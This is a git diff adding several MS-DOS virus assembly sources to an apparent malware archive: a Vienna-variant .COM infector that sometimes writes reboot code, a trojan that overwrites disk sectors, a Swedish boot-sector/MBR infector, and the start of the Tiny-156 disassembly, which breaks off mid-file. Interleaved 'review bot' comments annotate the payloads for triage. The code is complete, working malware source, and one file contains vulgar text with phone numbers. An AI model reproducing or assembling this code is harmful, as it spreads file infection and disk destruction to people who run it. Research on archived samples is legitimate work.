diff --git a/MSDOS/Virus.MSDOS.Unknown.v-oneate.asm b/MSDOS/Virus.MSDOS.Unknown.v-oneate.asm
new file mode 100644
index 00000000..202d4446
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.v-oneate.asm
@@ -0,0 +1,618 @@ +;************************************************************************ +; V-ONEATE Virus (Virus: One in Ate) +; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +; This is a variant of the Vienna strain which only runs its infectious +; code on an average 1 out of every 8 times it is run. When it is +; run, however, it infects 8 files. This is to make up for the +; slow infection rate. The 62 second flag has been modified for +; 61 seconds. The DOS v1.x checker is removed. Why? Do you +; know anyone who uses DOS v1.x? +;------------------------------------------------------------------------- + +MOV_CX MACRO X + DB 0B9H + DW X +ENDM + +CODE SEGMENT + ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE + ORG $+0100H + +;***************************************************************************** +;Start out with a JMP around the remains of the original .COM file, into the +;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS. +;The rest of the file (first 3 bytes) are stored in the virus data area. +;***************************************************************************** + +VCODE: JMP virus + +;This was the rest of the original .COM file. Tiny and simple, this time + + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + +;************************************************************ +; The actual virus starts here +;************************************************************ + +v_start equ $ + +virus: +;******************************************************************* +; Start of Virus Code: Get current system time +;******************************************************************* + + MOV AH,2CH + INT 21H + + AND DH,07h ;Last 3 bits 0? (once in eight) + JNZ all_done + +;******************************************************************* +; The special "one in eight" infection. 
If the above line were in +; its original form, this code would be run 1/8 of the time, and +; rather than appending a copy of this virus to the 8 .COM files, +; the virus simply runs the .COM program normally. +; ****************************************************************** + + PUSH CX + MOV DX,OFFSET vir_dat ;This is where the virus data starts. + ; The 2nd and 3rd bytes get modified. + CLD ;Pointers will be auto INcremented + MOV SI,DX ;Access data as offset from SI + ADD SI,first_3 ;Point to original 1st 3 bytes of .COM + MOV DI,OFFSET 100H ;`cause all .COM files start at 100H + MOV CX,3 + REPZ MOVSB ;Restore original first 3 bytes of .COM + MOV SI,DX ;Keep SI pointing to the data area + +;************************************************************* +; Get DTA address into ES:BX +;************************************************************* + PUSH ES + MOV AH,2FH + INT 21H + +;************************************************************* +; Save the DTA address +;************************************************************* + + MOV [SI+old_dta],BX + MOV [SI+old_dts],ES ;Save the DTA address + + POP ES + +;************************************************************* +; Set DTA to point inside the virus data area +;************************************************************* + + MOV DX,dta ;Offset of new DTA in virus data area +; NOP ;MASM will add this NOP here + ADD DX,SI ;Compute DTA address + MOV AH,1AH + INT 21H ;Set new DTA to inside our own code + + PUSH ES + PUSH SI + MOV ES,DS:2CH + MOV DI,0 ;ES:DI points to environment + JMP ifect + +; Here when it's time to close it up & end +; ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + +all_done: + PUSH DS + +;********************************************************************** +; Restore old DTA +;********************************************************************** + + MOV AH,1AH + MOV DX,[SI+old_dta] + MOV DS,[SI+old_dts] + INT 21H + + POP DS + 
+;************************************************************************* +; Clear registers used, & do a weird kind of JMP 100. The weirdness comes +; in since the address in a real JMP 100 is an offset, and the offset +; varies from one infected file to the next. By PUSHing an 0100H onto the +; stack, we can RET to address 0100H just as though we JMPed there. +;********************************************************************** + +quit: + POP CX + XOR AX,AX + XOR BX,BX + XOR DX,DX + XOR SI,SI + MOV DI,OFFSET 0100H + PUSH DI + XOR DI,DI + + RET 0FFFFH + + + +; The Infect Cycle +; ~~~~~~~~~~~~~~~~ +ifect: MOV CX,0008h +infect: PUSH CX + CALL theifect + POP CX + LOOP infect + +;************************************************************ +; Find the "PATH=" string in the environment +;************************************************************ +theifect: ; The infection Cycle begins +find_path: + POP SI + PUSH SI ;Get SI back + ADD SI,env_str ;Point to "PATH=" string in data area + LODSB + MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long + REPNZ SCASB ;Search for first character + MOV CX,4 + +;************************************************************ +; Loop to check for the next four characters +;************************************************************ + +check_next_4: + LODSB + SCASB + JNZ find_path ;If not all there, abort & start over + LOOP check_next_4 ;Loop to check the next character + + POP SI + POP ES + MOV [SI+path_ad],DI ;Save the address of the PATH + MOV DI,SI + ADD DI,wrk_spc ;File name workspace + MOV BX,SI ;Save a copy of SI + ADD SI,wrk_spc ;Point SI to workspace + MOV DI,SI ;Point DI to workspace + JMP SHORT slash_ok + +;********************************************************** +; Look in the PATH for more subdirectories, if any +;********************************************************** + +set_subdir: + CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? 
+ JNZ found_subdir ;If not, there are more subdirectories + JMP all_done ;Else, we're all done + +;********************************************************** +; Here if there are more subdirectories in the path +;********************************************************** + +found_subdir: + PUSH DS + PUSH SI + MOV DS,ES:2CH ;DS points to environment segment + MOV DI,SI + MOV SI,ES:[DI+path_ad] ;SI = PATH address + ADD DI,wrk_spc ;DI points to file name workspace + +;*********************************************************** +; Move subdirectory name into file name workspace +;*********************************************************** + +move_subdir: + LODSB ;Get character + CMP AL,';' ;Is it a ';' delimiter? + JZ moved_one ;Yes, found another subdirectory + CMP AL,0 ;End of PATH string? + JZ moved_last_one ;Yes + STOSB ;Save PATH marker into [DI] + JMP SHORT move_subdir + +;****************************************************************** +; Mark the fact that we're looking through the final subdirectory +;****************************************************************** + +moved_last_one: + MOV SI,0 + +;****************************************************************** +; Here after we've moved a subdirectory +;****************************************************************** + +moved_one: + POP BX ;Pointer to virus data area + POP DS ;Restore DS + MOV [BX+path_ad],SI ;Address of next subdirectory + NOP + +;****************************************************************** +; Make sure subdirectory ends in a "\" +;****************************************************************** + + CMP CH,'\' ;Ends with "\"? 
+ JZ slash_ok ;If yes + MOV AL,'\' ;Add one, if not + STOSB + +;****************************************************************** +; Here after we know there's a backslash at end of subdir +;****************************************************************** + +slash_ok: + MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace + MOV SI,BX ;Restore SI + ADD SI,f_spec ;Point to "*.COM" + MOV CX,6 + REPZ MOVSB ;Move "*.COM",0 to workspace + + MOV SI,BX + +;******************************************************************* +; Find first string matching *.COM +;******************************************************************* + + MOV AH,4EH + MOV DX,wrk_spc +; NOP ;MASM will add this NOP here + ADD DX,SI ;DX points to "*.COM" in workspace + MOV CX,3 ;Attributes of Read Only or Hidden OK + INT 21H + + JMP SHORT find_first + +;******************************************************************* +; Find next ASCIIZ string matching *.COM +;******************************************************************* + +find_next: + MOV AH,4FH + INT 21H + +find_first: + JNB found_file ;Jump if we found it + JMP SHORT set_subdir ;Otherwise, get another subdirectory + +;******************************************************************* +; Here when we find a file +;******************************************************************* + +found_file: + MOV AX,[SI+dta_tim] ;Get time from DTA + AND AL,1FH ;Mask to remove all but seconds + CMP AL,1EH ;61 seconds -> already infected + JZ find_next ;If so, go find another file + + CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? + JA find_next ;If too long, find another one + + CMP WORD PTR [SI+dta_len],0AH ;Is it too short? 
+ JB find_next ;Then go find another one + + MOV DI,[SI+nam_ptr] ;DI points to file name + PUSH SI ;Save SI + ADD SI,dta_nam ;Point SI to file name + +;******************************************************************** +; Move the name to the end of the path +;******************************************************************** + +more_chars: + LODSB + STOSB + CMP AL,0 + JNZ more_chars ;Move characters until we find a 00 + +;******************************************************************** +; Get File Attributes +;******************************************************************** + + POP SI + MOV AX,OFFSET 4300H + MOV DX,wrk_spc ;Point to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H + + MOV [SI+old_att],CX ;Save the old attributes + +;******************************************************************** +; Rewrite the attributes to allow writing to the file +;******************************************************************** + + MOV AX,OFFSET 4301H ;Set attributes + AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) + MOV DX,wrk_spc ;Offset of \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + +;******************************************************************** +; Open Read/Write channel to the file +;******************************************************************** + + MOV AX,OFFSET 3D02H ;Read/Write + MOV DX,wrk_spc ;Offset to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + + JNB opened_ok ;If file was opened OK + JMP fix_attr ;If it failed, restore the attributes + +;******************************************************************* +; Get the file date & time +;******************************************************************* + +opened_ok: + MOV BX,AX + MOV AX,OFFSET 5700H + INT 21H + + MOV [SI+old_tim],CX ;Save file time + MOV [SI+ol_date],DX ;Save the date + 
+;******************************************************************* +; Get current system time +;******************************************************************* + + MOV AH,2CH + INT 21H + + AND DH,7 ;Last 3 bits 0? (once in eight) + JNZ seven_in_eight + +;******************************************************************* +; The special "one in eight" infection. If the above line were in +; its original form, this code would be run 1/8 of the time, and +; rather than appending a copy of this virus to the .COM file, the +; file would get 5 bytes of code that reboot the system when the +; .COM file is run. +;******************************************************************* + + MOV AH,40H ;Write to file + MOV CX,5 ;Five bytes + MOV DX,SI + ADD DX,reboot ;Offset of reboot code in data area + INT 21H + + JMP SHORT fix_time_stamp + + NOP + +;****************************************************************** +; Here's where we infect a .COM file with this virus +;****************************************************************** + +seven_in_eight: + MOV AH,3FH + MOV CX,3 + MOV DX,first_3 +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H ;Save first 3 bytes into the data area + + JB fix_time_stamp ;Quit, if read failed + + CMP AX,3 ;Were we able to read all 3 bytes? 
+ JNZ fix_time_stamp ;Quit, if not + +;****************************************************************** +; Move file pointer to end of file +;****************************************************************** + + MOV AX,OFFSET 4202H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Quit, if it didn't work + + MOV CX,AX ;DX:AX (long int) = file size + SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) + MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction + + ADD CX,OFFSET c_len_y + MOV DI,SI ;Point DI to virus data area + SUB DI,OFFSET c_len_x + ;Point DI to reference vir_dat, at start of pgm + MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm + +;******************************************************************* +; Write virus code to file +;******************************************************************* + + MOV AH,40H + + MOV_CX virlen ;Length of virus, in bytes + + MOV DX,SI + SUB DX,OFFSET codelen ;Length of virus code, gives starting + ; address of virus code in memory + INT 21H + + JB fix_time_stamp ;Jump if error + + CMP AX,OFFSET virlen ;All bytes written? 
+ JNZ fix_time_stamp ;Jump if error + +;********************************************************************** +; Move file pointer to beginning of the file +;********************************************************************** + + MOV AX,OFFSET 4200H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Jump if error + +;********************************************************************** +; Write the 3 byte JMP at the start of the file +;********************************************************************** + + MOV AH,40H + MOV CX,3 + MOV DX,SI ;Virus data area + ADD DX,jmp_op ;Point to the reconstructed JMP + INT 21H + +;********************************************************************** +; Restore old file date & time, with seconds modified to 62 +;********************************************************************** + +fix_time_stamp: + MOV DX,[SI+ol_date] ;Old file date + MOV CX,[SI+old_tim] ;Old file time + AND CX,OFFSET 0FFE0H + OR CX,1EH ;Seconds = 31/30 min = 61 seconds + MOV AX,OFFSET 5701H + INT 21H + +;********************************************************************** +; Close File +;********************************************************************** + + MOV AH,3EH + INT 21H + +;********************************************************************** +; Restore Old File Attributes +;********************************************************************** + +fix_attr: + MOV AX,OFFSET 4301H + MOV CX,[SI+old_att] ;Old Attributes + MOV DX,wrk_spc +; NOP ;MASM will add this NOP + ADD DX,SI ;DX points to \path\name in workspace + INT 21H + RET +; End of Infection loop +; ^^^^^^^^^^^^^^^^^^^^^ + + +;************************************************************************ +;The virus data starts here. 
It's accessed off the SI register, per the +; comments as shown +;************************************************************************ + +vir_dat EQU $ + + ;Use this with (SI + old_dta) +olddta_ DW 0 ;Old DTA offset + + ;Use this with (SI + old_dts) +olddts_ DW 0 ;Old DTA segment + + ;Use this with (SI + old_tim) +oldtim_ DW 0 ;Old Time + + ;Use this with (SI + ol_date) +oldate_ DW 0 ;Old date + + ;Use this with (SI + old_att) +oldatt_ DW 0 ;Old file attributes + +;Here's where the first three bytes of the original .COM file go.(SI + first_3) + +first3_ EQU $ + INT 20H + NOP + +;Here's where the new JMP instruction is worked out + + ;Use this with (SI + jmp_op) +jmpop_ DB 0E9H ;Start of JMP instruction + + ;Use this with (SI + jmp_dsp) +jmpdsp_ DW 0 ;The displacement part + +;This is the type of file we're looking to infect. (SI + f_spec) + +fspec_ DB '*.COM',0 + + ;Use this with (SI + path_ad) +pathad_ DW 0 ;Path address + + ;Use this with (SI + nam_ptr) +namptr_ DW 0 ;Pointer to start of file name + + ;Use this with (SI + env_str) +envstr_ DB 'PATH=' ;Find this in the environment + + ;File name workspace (SI + wrk_spc) +wrkspc_ DB 40h dup (0) + + ;Use this with (SI + dta) +dta_ DB 16h dup (0) ;Temporary DTA goes here + + ;Use this with (SI + dta_tim) +dtatim_ DW 0,0 ;Time stamp in DTA + + ;Use this with (SI + dta_len) +dtalen_ DW 0,0 ;File length in the DTA + + ;Use this with (SI + dta_nam) +dtanam_ DB 0Dh dup (0) ;File name in the DTA + + ;Use this with (SI + reboot) +reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 + +lst_byt EQU $ ;All lines that assemble into code are + ; above this one + +;***************************************************************************** +;The virus needs to know a few details about its own size and the size of its +; code portion. Let the assembler figure out these sizes automatically. 
+;***************************************************************************** + +virlen = lst_byt - v_start ;Length, in bytes, of the entire virus +codelen = vir_dat - v_start ;Length of virus code, only +c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code +c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP + +;***************************************************************************** +;Because this code is being appended to the end of an executable file, the +; exact address of its variables cannot be known. All are accessed as offsets +; from SI, which is represented as vir_dat in the below declarations. +;***************************************************************************** + +old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset +old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment +old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp +ol_date = oldate_ - vir_dat ;Displacement to old file date stamp +old_att = oldatt_ - vir_dat ;Displacement to old attributes +first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM +jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode +jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP +f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string +path_ad = pathad_ - vir_dat ;Displacement to the path address +nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer +env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string +wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace +dta = dta_ - vir_dat ;Displacement to the temporary DTA +dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA +dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA +dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA +reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code + + CODE ENDS +END VCODE + + 
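Review bot: The infection-marker comments contradict the code: the file header says the marker was changed to 61 seconds, the `fix_time_stamp` banner says 62, and the value actually written by `OR CX,1EH` (and tested by `CMP AL,1EH` under `found_file`) is a 5-bit DOS seconds/2 field of 1Eh, i.e. 60 seconds, a value no ordinary timestamp carries. For an archived sample that field is the triage indicator, so the comment on `OR CX,1EH` should read `;Seconds field = 1Eh (2-second units) -> 60 s; marks file as infected` and the banner above it should be corrected to match. The same inconsistency should be fixed in the header paragraph, which is otherwise the only summary a reader gets.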
diff --git a/MSDOS/Virus.MSDOS.Unknown.vir20.asm b/MSDOS/Virus.MSDOS.Unknown.vir20.asm
new file mode 100644
index 00000000..ad35f568
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.vir20.asm
@@ -0,0 +1,132 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 10 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : VCLMIKES.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 16:27) +;* To : Viral Doctor +;* Subj : VCLMIKES.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +; MIKESICA.ASM -- Mike Sica v1.0 +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Digital Justice + +virus_type equ 3 ; Trojan Horse +is_encrypted equ 0 ; We're not encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov ah,0Fh ; BIOS get video mode function + int 010h + xor ah,ah ; BIOS set video mode function + int 010h + + mov dx,0045h ; First argument is 69 + push es ; Save ES + mov ax,040h ; Set extra segment to 040h + mov es,ax ; (ROM BIOS) + mov word ptr es:[013h],dx ; Store new RAM ammount + pop es ; Restore ES + + mov si,0001h ; First argument is 1 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl si,1 ; Convert to word index + mov word ptr [si + 0407h],0 ; Zero LPT port address + 
pop es ; Restore ES + + mov si,0001h ; First argument is 1 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl si,1 ; Convert to word index + mov word ptr [si + 03FEh],0 ; Zero COM port address + pop es ; Restore ES + + mov ax,0002h ; First argument is 2 + mov cx,0064h ; Second argument is 100 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) +trash_loop: int 026h ; DOS absolute write interrupt + dec ax ; Select the previous disk + cmp ax,-1 ; Have we gone too far? + jne trash_loop ; If not, repeat with new drive + sti ; Restore interrupts + + cli ; Clear the interrupt flag + hlt ; HaLT the computer + jmp short $ ; Just to make sure + + mov cx,0045h ; First argument is 69 + jcxz beep_end ; Exit if there are no beeps + mov ax,0E07h ; BIOS display char., BEL +beep_loop: int 010h ; Beep + loop beep_loop ; Beep until --CX = 0 +beep_end: + + + mov ax,04C00h ; DOS terminate function + int 021h +main endp + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "!! Written By Mike Sica !!" + db "I Suck Big Phat Hairy Cocks!!" + db "Call Anytime Phor Good Head:" + db "794-0533 or 794-3626" + db "Both In The 804 Area Code!!" + +finish label near + +code ends + end main + +;-+- GEcho 1.10+ +; + Origin: Data Fellows BBS (2:283/718) +;============================================================================= + +;Yoo-hooo-oo, -! +; +; +; The MeeO + +;/x Include false conditionals in listing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir21.asm b/MSDOS/Virus.MSDOS.Unknown.vir21.asm new file mode 100644 index 00000000..0471f199 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir21.asm 
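Review bot: The destructive step at `trash_loop` is commented only as `DOS absolute write interrupt`, while the preceding `mov ax,0002h`, `mov cx,0064h` and `cwd` are what a triage reader needs: they set INT 26h's drive (AL=2, C:, then B: and A: as `dec ax` walks down), sector count (100) and start sector (0), with BX still holding `offset null_vector` as the buffer. A comment above the label, `; INT 26h: overwrite logical sectors 0..99 of C:, B: and A: with program bytes`, would make the payload explicit. The `cli`/`hlt`/`jmp short $` sequence that follows never returns, so the beep loop and the `04C00h` terminate call after it are unreachable and should be marked as dead code. The earlier stores `mov word ptr [si + 0407h],0` and `mov word ptr [si + 03FEh],0` use the default DS segment rather than `es:`, so despite their comments they write into the program's own segment and not the BIOS data area; the comments should say so, so that an analysis does not overstate what the sample does.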
@@ -0,0 +1,277 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 11 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : SWEDISH.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:28) +;* To : Brad Frazee +;* Subj : SWEDISH.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org +;; +; Lgger gamla bootsectorn p sida 1, spr 0, sector 3. +; sida 0, spr 0, sector 7 p HD. + +Code Segment + Assume cs:Code + Org 0000h + +Main Proc Far + db 0EAh,05h,00h,0C0h,07h + + jmp Near Ptr Init ; Hoppa frbi variabler och nya int13h + +; Variabler + +Old13h dd 0 ; Gamla vectorn till diskfunktionerna. +TmpVec dd 0 ; Temporr vec. vid ndring av int 13. +BootPek dw 0003h,0100h +; Slut p variabler +Int13h Proc Near + push ds + push ax + push bx + + cmp dl,00h ; Drive A + jne Exit + + cmp ah,02h + jb Exit + cmp ah,04h + ja Exit ; Kolla s att func. 2-4 + + sub ax,ax + mov ds,ax + mov bx,043Fh ; Motor status byte. + test Byte Ptr [bx],01h ; Testa om motorn i A: r p.. + jnz Exit ; Nej,hoppa till gamla int 13h + + call Smitta + +Exit: pop bx + pop ax + pop ds + jmp [Old13h] + +Smitta Proc Near + push cx + push dx + push si + push di + push es + + push cs + pop es + push cs + pop ds + + mov si,0004h ; Max antal frsk. + +Retry: mov ax,0201h ; Ls en sector + mov bx,0200h ; Ls hit. + mov cx,0001h ; Spr 0 Sector 1 + sub dx,dx ; Sida 0 Drive 0 + pushf + call [Old13h] ; Ls in booten. + + jnc OK + + dec si + jz Slut ; Hoppa ur om fel. + jmp Retry ; Frsk max 4 gnger. + +OK: mov si,0200h + sub di,di + cld + lodsw + cmp ax,[di] + jne L2 + lodsw + cmp ax,[di+2] + jne L2 + jmp Slut + +L2: mov ax,0301h ; Skriv en sector. 
+ mov bx,0200h + mov cx,0003h ; Spr 0 Sector 3 + mov dx,0100h ; Sida 1 Drive 0 + pushf + call [Old13h] ; Flytta boot sectorn. + + mov ax,0301h + sub bx,bx + mov cx,0001h + sub dx,dx + pushf + call [Old13h] ; Skriv ner viruset till booten. + +Slut: pop es + pop di + pop si + pop dx + pop cx + ret +Smitta Endp +Int13h Endp + +Init: sub ax,ax + mov ds,ax ; Nollar ds fr att ndra vect. + + cli + mov ss,ax + mov sp,7C00h + sti ; Stter upp en ny stack. + + push cs + pop es + mov di,Offset Old13h + mov si,004Ch + mov cx,0004h + cld + rep movsb ; Flytta int 13h vectorn. + + mov bx,0413h + mov ax,[bx] ; Minnesstorleken till ax. + dec ax + dec ax + mov [bx],ax ; Reservera plats fr viruset. + + mov cl,06h + shl ax,cl + mov es,ax ; Omvandla till segment addres. + + mov Word Ptr TmpVec,Offset Int13h + mov Word Ptr TmpVec+2,es + push es + sub ax,ax + mov es,ax + push cs + pop ds + mov si,Offset TmpVec + mov di,004Ch + mov cx,0004h + rep movsb + pop es + + sub si,si + mov di,si + mov cx,0200h ; Hela viruset + lite till. + rep movsb + + mov ax,Offset Here + push es + push ax + ret ; Hoppa till viruset. + +Here: sub ax,ax + int 13h ; terstll driven + + sub ax,ax + mov es,ax + mov ax,0201h ; Ls en sector funk. + mov bx,7C00h ; Hit laddas booten normalt. + mov cx,BootPek + mov dx,BootPek+2 + int 13h + + push cs + pop es + mov ax,0201h + mov bx,0200h + mov cx,0001h + mov dx,0080h + int 13h ; Ls in partions tabellen. + jc Over + push cs + pop ds + mov si,0200h + sub di,di + lodsw + cmp ax,[di] ; Kolla om den r smittad. + jne HdInf + lodsw + cmp ax,[di+2] + jne HdInf + +Over: mov BootPek,0003h + mov BootPek+2,0100h + sub bx,bx + push bx + mov bx,7C00h + push bx + ret ; Kr den gamla booten. + +HdInf: mov BootPek,0007h + mov BootPek+2,0080h + + mov ax,0301h + mov bx,0200h + mov cx,0007h + mov dx,0080h + int 13h ; Flytta orgin. part.tabellen. + jc Over + + push cs + pop ds + push cs + pop es + mov si,03BEh + mov di,01BEh + mov cx,0042h + cld + rep movsb ; Kopiera part. data till viruset. 
+ + mov ax,0301h + sub bx,bx + mov cx,0001h + mov dx,0080h + int 13h ; Skriv viruset till part. tabellen. + + + sub ax,ax + mov es,ax ; Kolla om msg:et ska skrivas ut. + test Byte Ptr es:[046Ch],07h + jnz HdInf1 + + mov si,Offset Txt ; Detta utfrs bara om man bootar frn + cld ; diskett. +Foo1: lodsb + cmp al,00h + je HdInf1 + mov ah,0Eh + sub bx,bx + int 10h + jmp Foo1 + +HdInf1: jmp Over + +Slutet Label Byte ; Anvnds fr att veta var slutet r. + +Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h + +Main Endp +Code Ends + End + +;-+- GEcho 1.00 +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/3 Enable 32-bit processing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir22.asm b/MSDOS/Virus.MSDOS.Unknown.vir22.asm new file mode 100644 index 00000000..75dde233 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir22.asm 
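Review bot: The only statement of where this boot virus parks the original boot sector is the Swedish header comment whose non-ASCII letters were lost in transit (`Lgger gamla bootsectorn p sida 1, spr 0, sector 3`), so the forensic locations are hard to read off. The code fixes them: `mov cx,0003h`/`mov dx,0100h` in `Smitta` writes the floppy's original boot sector to head 1, track 0, sector 3, and `mov cx,0007h`/`mov dx,0080h` under `HdInf` writes the hard disk's original MBR to head 0, track 0, sector 7, from which `BootPek` later reloads it. An English comment on each of those write calls, e.g. `; save original floppy boot sector at C0/H1/S3` and `; save original MBR at C0/H0/S7`, would let an analyst recover them without the Swedish. The already-infected test (`lodsw`/`cmp ax,[di]` twice, comparing the first two words of the read sector with the virus's own first bytes) is likewise worth a one-line comment, since it is the self-recognition signature.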
@@ -0,0 +1,214 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 12 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_156.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 16:30) +;* To : Graham Allen +;* Subj : TINY_156.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org + page ,132 + name TINY156 + title The 'Tiny' virus, version TINY-156 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-156 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. 
+ +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? 
